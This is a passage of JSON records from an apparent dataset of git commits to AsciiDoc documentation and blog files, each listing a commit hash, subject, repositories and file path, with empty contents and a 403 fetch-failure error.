'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48e7319439408f58b5b9a8dca1eb5f408f1f02c9","subject":"Update 2019-11-18-Alarme-Clover-Post.adoc","message":"Update 2019-11-18-Alarme-Clover-Post.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2019-11-18-Alarme-Clover-Post.adoc","new_file":"_posts\/2019-11-18-Alarme-Clover-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae19dc5f58ca6897991663392f6b4aff7671301d","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1fedaabde5c036e29f9f78f8e75bff873e9d6dd","subject":"Update 2017-02-22-A-Sleepy-Poem.adoc","message":"Update 2017-02-22-A-Sleepy-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-02-22-A-Sleepy-Poem.adoc","new_file":"_posts\/2017-02-22-A-Sleepy-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d340af7dc250388f48d36c5078c4857c51bb6121","subject":"Add nng_bus man page.","message":"Add nng_bus man page.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/nng_bus.adoc","new_file":"docs\/nng_bus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b80c0b7a25ee9b3751f9916dc01543b6987adf00","subject":"add branding page (SEO common misspellings, logo searches, etc)","message":"add branding page (SEO common misspellings, logo searches, etc)\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"community\/branding.adoc","new_file":"community\/branding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bba559f5611e4e3e7b659c86275ffa922029a624","subject":"#169: added README for event","message":"#169: added README for event\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"event\/README.adoc","new_file":"event\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d4e51ec9aba607896c63d5a0b75a76cef54680c7","subject":"Clearer gId","message":"Clearer gId\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f5fe10ddc7e1b7835b50a2f2c5d2355e71a11d1","subject":"added amendment record","message":"added amendment record\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/MML4\/amendment.adoc","new_file":"doc\/MML4\/amendment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skoba\/mml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3601b492c7359158175b3e2ccbe7eae72e0d537","subject":":memo: datetime-format","message":":memo: datetime-format\n","repos":"syon\/refills","old_file":"src\/refills\/code\/datetime-format.adoc","new_file":"src\/refills\/code\/datetime-format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53b8c09a2de7c4eb671f682fe10fab27bd620159","subject":"Add a contributing manual to explain how to build and release the project","message":"Add a contributing manual to explain how to build and release the project\n","repos":"dgouyette\/hamsters,scala-hamsters\/hamsters","old_file":"contributing.adoc","new_file":"contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scala-hamsters\/hamsters.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1ef752d5c4c0340bdc3f78ff71c78aea841001c","subject":"Create user_management.adoc","message":"Create user_management.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/user_management.adoc","new_file":"userguide\/tutorials\/user_management.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ed273e7e856eb2f1d1ab1a768d48ee33fea03a5","subject":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","message":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e41356e4674336f0a7211568e7f190975faac85","subject":"Update 2017-01-27-Treffen-am-27-Januar-2017.adoc","message":"Update 2017-01-27-Treffen-am-27-Januar-2017.adoc","repos":"creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io","old_file":"_posts\/2017-01-27-Treffen-am-27-Januar-2017.adoc","new_file":"_posts\/2017-01-27-Treffen-am-27-Januar-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/creative-coding-bonn\/creative-coding-bonn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d57d35f05b54c8d7596db1926d95327253c8263b","subject":"Update 2015-07-05-My-Toughest-24-hours.adoc","message":"Update 2015-07-05-My-Toughest-24-hours.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-07-05-My-Toughest-24-hours.adoc","new_file":"_posts\/2015-07-05-My-Toughest-24-hours.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a9bda9eb87f678ea99d6a09690768af9d70f107","subject":"doc: Unify the documentation for menu keys","message":"doc: Unify the documentation for menu keys\n","repos":"jkonecny12\/kakoune,lenormf\/kakoune,jjthrash\/kakoune,Somasis\/kakoune,alexherbo2\/kakoune,occivink\/kakoune,casimir\/kakoune,Somasis\/kakoune,lenormf\/kakoune,alexherbo2\/kakoune,alexherbo2\/kakoune,danr\/kakoune,jjthrash\/kakoune,mawww\/kakoune,jjthrash\/kakoune,casimir\/kakoune,danr\/kakoune,danr\/kakoune,occivink\/kakoune,mawww\/kakoune,mawww\/kakoune,casimir\/kakoune,jjthrash\/kakoune,casimir\/kakoune,lenormf\/kakoune,jkonecny12\/kakoune,Somasis\/kakoune,Somasis\/kakoune,occivink\/kakoune,jkonecny12\/kakoune,alexherbo2\/kakoune,mawww\/kakoune,lenormf\/kakoune,jkonecny12\/kakoune,danr\/kakoune,occivink\/kakoune","old_file":"doc\/manpages\/keys.asciidoc","new_file":"doc\/manpages\/keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjthrash\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"51fcd980950c660918ded745a186c03b08467f81","subject":"add README","message":"add README\n","repos":"themurph\/openshift-tools,twiest\/openshift-tools,twiest\/openshift-tools,drewandersonnz\/openshift-tools,ivanhorvath\/openshift-tools,openshift\/openshift-tools,rhdedgar\/openshift-tools,twiest\/openshift-tools,openshift\/openshift-tools,rhdedgar\/openshift-tools,joelddiaz\/openshift-tools,openshift\/openshift-tools,joelddiaz\/openshift-tools,tiwillia\/openshift-tools,ivanhorvath\/openshift-tools,twiest\/openshift-tools,andrewklau\/openshift-tools,ivanhorvath\/openshift-tools,rhdedgar\/openshift-tools,joelddiaz\/openshift-tools,andrewklau\/openshift-tools,twiest\/openshift-tools,ivanhorvath\/openshift-tools,andrewklau\/openshift-tools,joelsmith\/openshift-tools,ivanhorvath\/openshift-tools,tiwillia\/openshift-tools,blrm\/openshift-tools,themurph\/openshift-tools,drewandersonnz\/openshift-tools,andrewklau\/openshift-tools,blrm\/openshift-tools,joelsmith\/openshift-tools,jupierce\/openshift-tools,jupierce\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,drewandersonnz\/openshift-tools,blrm\/openshift-tools,themurph\/openshift-tools,rhdedgar\/openshift-tools,jupierce\/openshift-tools,themurph\/openshift-tools,joelddiaz\/openshift-tools,jupierce\/openshift-tools,openshift\/openshift-tools,themurph\/openshift-tools,openshift\/openshift-tools,openshift\/openshift-tools,andrewklau\/openshift-tools,jupierce\/openshift-tools,blrm\/openshift-tools,drewandersonnz\/openshift-tools,joelsmith\/openshift-tools,drewandersonnz\/openshift-tools,tiwillia\/openshift-tools,rhdedgar\/openshift-tools,ivanhorvath\/openshift-tools,joelsmith\/openshift-tools,blrm\/openshift-tools,tiwillia\/openshift-tools,drewandersonnz\/openshift-tools,tiwillia\/openshift-tools,joelddiaz\/openshift-tools,twiest\/openshift-tools","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openshift\/openshift-tools.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac17156ad34df25971d89f597cbfb17d961dc81e","subject":"Initial commit","message":"Initial commit\n","repos":"ciarand\/dotfiles,ciarand\/dotfiles","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciarand\/dotfiles.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5ed46af08766ee57c615659c351427cd6559d65e","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46105d6c525c09021bafdd02364672f933fe52e5","subject":"add survey news item","message":"add survey news item\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2019\/01\/07\/clojure-2019-survey.adoc","new_file":"content\/news\/2019\/01\/07\/clojure-2019-survey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"125ab632dc08792c1cece7869feb0985e72c705b","subject":"Create index.adoc","message":"Create index.adoc","repos":"KostyaSha\/github-integration-plugin,KostyaSha\/github-integration-plugin,jenkinsci\/github-pullrequest-plugin,jenkinsci\/github-integration-plugin,KostyaSha\/github-integration-plugin,jenkinsci\/github-pullrequest-plugin,jenkinsci\/github-integration-plugin,KostyaSha\/github-integration-plugin,jenkinsci\/github-integration-plugin,jenkinsci\/github-pullrequest-plugin","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/github-integration-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff236f9d8011c6bc63c78690463d78e47b936a75","subject":"Convert user manual to ADOC format.","message":"Convert user manual to ADOC format.\n","repos":"jfitz\/BASIC-1965,jfitz\/BASIC-1965","old_file":"doc\/UserManual.adoc","new_file":"doc\/UserManual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfitz\/BASIC-1965.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a9fa6d0547ce420caca6a9c41baf2d1dc9b76e9","subject":"Update 2015-09-03-4511xposed.adoc","message":"Update 2015-09-03-4511xposed.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-03-4511xposed.adoc","new_file":"_posts\/2015-09-03-4511xposed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a6da43d3f485937a61e8c86fcc0a8a3519cfe41","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe424dd5d45ecd12ac520f516f35a2f742e5ff94","subject":"y2b create post MacBook Pro 2012 Review (15\\","message":"y2b create post MacBook Pro 2012 Review (15\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-06-25-MacBook-Pro-2012-Review-15.adoc","new_file":"_posts\/2012-06-25-MacBook-Pro-2012-Review-15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ce8e5e612cbbfc45bc3680a5e87a5c1a7cfeb96","subject":"doc: remove cisco live from index","message":"doc: remove cisco live from index\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_index.asciidoc","new_file":"doc\/trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0233fc2586d31ab4ccc106739fa13147e4d5fc3c","subject":"Fix release notes formatting for multi-paragraph list items","message":"Fix release notes formatting for multi-paragraph list items\n\nIf a list item spans multiple paragraphs in AsciiDoc, it needs\na '+' in the intervening blank line, and the latter paragraphs\nshould not be indented on their first line. The text is a bit\nuglier, but it fixes the rendering.\n\nChange-Id: Ie65570ed32acef1c3025f351f7c4b4944f443f6e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4089\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n(cherry picked from commit ffd8fa4758fd8598a8d06a79249a6ab57d72aa81)\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4090\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b393fb26f60fe5b92ee26606f67e34cd96b7566","subject":"Added roundRobin load balancer EIP docs","message":"Added roundRobin load balancer EIP docs\n","repos":"rmarting\/camel,dmvolod\/camel,curso007\/camel,cunningt\/camel,DariusX\/camel,ullgren\/camel,onders86\/camel,Fabryprog\/camel,onders86\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,onders86\/camel,dmvolod\/camel,snurmine\/camel,jonmcewen\/camel,tadayosi\/camel,gautric\/camel,onders86\/camel,apache\/camel,CodeSmell\/camel,akhettar\/camel,ullgren\/camel,apache\/camel,alvinkwekel\/camel,pax95\/camel,jonmcewen\/camel,anoordover\/camel,gautric\/camel,gautric\/camel,akhettar\/camel,davidkarlsen\/camel,akhettar\/camel,pmoerenhout\/camel,objectiser\/camel,curso007\/camel,onders86\/camel,snurmine\/camel,kevinearls\/camel,sverkera\/camel,sverkera\/camel,gnodet\/camel,objectiser\/camel,christophd\/camel,pmoerenhout\/camel,CodeSmell\/camel,CodeSmell\/camel,tadayosi\/camel,davidkarlsen\/camel,zregvart\/camel,alvinkwekel\/camel,akhettar\/camel,akhettar\/camel,tdiesler\/camel,adessaigne\/camel,jamesnetherton\/camel,objectiser\/camel,gautric\/camel,tdiesler\/camel,anoordover\/camel,pmoerenhout\/camel,kevinearls\/camel,gautric\/camel,gnodet\/camel,nikhilvibhav\/camel,jonmcewen\/camel,tdiesler\/camel,nicolaferraro\/camel,gnodet\/camel,pax95\/camel,cunningt\/camel,dmvolod\/camel,kevinearls\/camel,anoordover\/camel,ullgren\/camel,rmarting\/camel,nicolaferraro\/camel,jamesnetherton\/camel,cunningt\/camel,punkhorn\/camel-upstream,pax95\/camel,mcollovati\/camel,cunningt\/camel,ullgren\/camel,davidkarlsen\/camel,jamesnetherton\/camel,Fabryprog\/camel,tadayosi\/camel,curso007\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,dmvolod\/camel,onders86\/camel,snurmine\/camel,kevinearls\/camel,zregvart\/camel,apache\/camel,gnodet\/camel,alvinkwekel\/camel,snurmine\/camel,nicolaferraro\/camel,DariusX\/camel,adessaigne\/camel,curso007\/camel,dmvolod\/camel,CodeSmell\/camel,gnodet\/camel,sverkera\/camel,anoordover\/camel,pmoerenhout\/camel,tdiesler\/camel,jamesnetherton\/camel,anoordover\/camel,kevinearls\/camel,christophd\/camel,curso007\/camel,christophd\/camel,davidkarlsen\/camel,pmoerenhout\/camel,christophd\/camel,nikhilvibhav\/camel,rmarting\/camel,alvinkwekel\/camel,pmoerenhout\/camel,DariusX\/camel,mcollovati\/camel,objectiser\/camel,adessaigne\/camel,tdiesler\/camel,mcollovati\/camel,zregvart\/camel,tadayosi\/camel,jonmcewen\/camel,jamesnetherton\/camel,cunningt\/camel,nicolaferraro\/camel,gautric\/camel,apache\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,pax95\/camel,christophd\/camel,pax95\/camel,rmarting\/camel,sverkera\/camel,pax95\/camel,adessaigne\/camel,cunningt\/camel,punkhorn\/camel-upstream,tdiesler\/camel,anoordover\/camel,adessaigne\/camel,zregvart\/camel,rmarting\/camel,Fabryprog\/camel,tadayosi\/camel,sverkera\/camel,kevinearls\/camel,snurmine\/camel,nikhilvibhav\/camel,jonmcewen\/camel,DariusX\/camel,mcollovati\/camel,apache\/camel,sverkera\/camel,dmvolod\/camel,akhettar\/camel,christophd\/camel,curso007\/camel,jamesnetherton\/camel,snurmine\/camel,rmarting\/camel,adessaigne\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/roundRobin-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/roundRobin-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"623c40ab882570b767d19213f2546c36c7021010","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93b83c31de11c8aa375c3b4f3573eed3b6e0f9ed","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb72a1dbf26e1bfb810fe46b1a573bdb8a6944fe","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"215c5f292a9b954fa7ccfe3f29540875076ae1ae","subject":"[DOCS] Improve install and setup section for SQL JDBC","message":"[DOCS] Improve install and setup section for SQL JDBC\n","repos":"gfyoung\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"x-pack\/docs\/en\/sql\/endpoints\/jdbc.asciidoc","new_file":"x-pack\/docs\/en\/sql\/endpoints\/jdbc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85dab024fae752fec059469c716f3be417d35378","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3d8ca6e41e78c8bb97bc89323101f463853de62","subject":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","message":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4178c0ec3d4131b7cb2771287e942b36f6c032aa","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f8a72b1dea72dde1633f5696890d0b4f6785761","subject":"Update 2016-09-03-CME-New-Release-VPN.adoc","message":"Update 2016-09-03-CME-New-Release-VPN.adoc","repos":"mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io","old_file":"_posts\/2016-09-03-CME-New-Release-VPN.adoc","new_file":"_posts\/2016-09-03-CME-New-Release-VPN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattpearson\/mattpearson.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae79b7e70e37e20a0b97bc4220c142289c161ede","subject":"Update 2015-08-25-Uberkonsum.adoc","message":"Update 2015-08-25-Uberkonsum.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a22edce9ec3f45b056ab471fa7189e1b4a90895a","subject":"y2b create post PS4 vs Xbox One: The Full Story","message":"y2b create post PS4 vs Xbox One: The Full 